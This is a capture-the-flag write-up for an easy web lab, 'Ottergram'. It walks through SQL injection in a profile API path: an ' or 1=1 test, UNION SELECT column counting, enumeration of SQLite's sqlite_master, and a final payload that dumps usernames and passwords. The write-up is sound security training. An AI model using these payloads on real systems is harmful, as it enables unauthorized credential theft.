# Ottergram

Level: Easy\
Points: 10\
Type: Daily Challenge

Lab Interface

<figure><img src="https://559802299-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8C3FiojCIEtxH7nox2Do%2Fuploads%2FhyelrHjRmb73mA6qAoPi%2Fimage.png?alt=media&#x26;token=32c7c8d5-4edf-4829-9d3a-3bf0d0de72f3" alt=""><figcaption></figcaption></figure>

Intersting request

```
GET /api/profile/sushil
```

<figure><img src="https://559802299-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8C3FiojCIEtxH7nox2Do%2Fuploads%2FkrnqASp3N0hb3qxdfXNY%2Fimage.png?alt=media&#x26;token=edd05a06-0839-45f5-80dc-f49aa4a10552" alt=""><figcaption></figcaption></figure>

Possible SQLi in path parameter.\
Using simple payload `' or 1=1 -- -` proves this parameter is indeed vulnerable to sqli

<figure><img src="https://559802299-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8C3FiojCIEtxH7nox2Do%2Fuploads%2FcSGk6PuhXzxoZZkS50Mq%2Fimage.png?alt=media&#x26;token=d279d6b4-7edb-4ca1-b133-fad85c7efa34" alt=""><figcaption></figcaption></figure>

Next step, finding column number. Using union select method, I found the no of column = 7

```
' union select 1,2,3,4,5,6,7 -- -
```

<figure><img src="https://559802299-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8C3FiojCIEtxH7nox2Do%2Fuploads%2FODkmcltcYpNrc3Xp0JGI%2Fimage.png?alt=media&#x26;token=5763724d-c897-49ef-9f8f-e0edc5433758" alt=""><figcaption></figcaption></figure>

Using [PayloadsAllTheThings SQLi Cheatsheet](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection#dbms-identification), I found the database to be sqlite

Next is dumping the columns name.

```
' union select 1,2,3,4,5,6,group_concat(tbl_name) from sqlite_master -- -
```

<figure><img src="https://559802299-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8C3FiojCIEtxH7nox2Do%2Fuploads%2FbyLiUzq0SDLmZY5xTSmC%2Fimage.png?alt=media&#x26;token=f5851609-9957-41f2-ba59-70a846b4b51d" alt=""><figcaption></figcaption></figure>

`users` table looks intersting.

Next step is to get columns name from `users` table.

```
' union select 1,2,3,4,5,6,MAX(sql) from sqlite_master WHERE tbl_name='users' -- -
```

<figure><img src="https://559802299-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8C3FiojCIEtxH7nox2Do%2Fuploads%2FBs0r9tg6mn1oUkBtc810%2Fimage.png?alt=media&#x26;token=dc59e702-90a2-4992-8eea-c600e96f8bd9" alt=""><figcaption></figcaption></figure>

Two interesting columns on `users` table are `username` and `password` . Dumping them as

```
' union select 1,2,3,4,5,username,password from users -- -
```

<figure><img src="https://559802299-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F8C3FiojCIEtxH7nox2Do%2Fuploads%2FiarmrYtBVoppkAubhcc4%2Fimage.png?alt=media&#x26;token=8bdb03a5-f132-4ab3-8cfa-09cdfbd2319d" alt=""><figcaption></figcaption></figure>

Got the flag.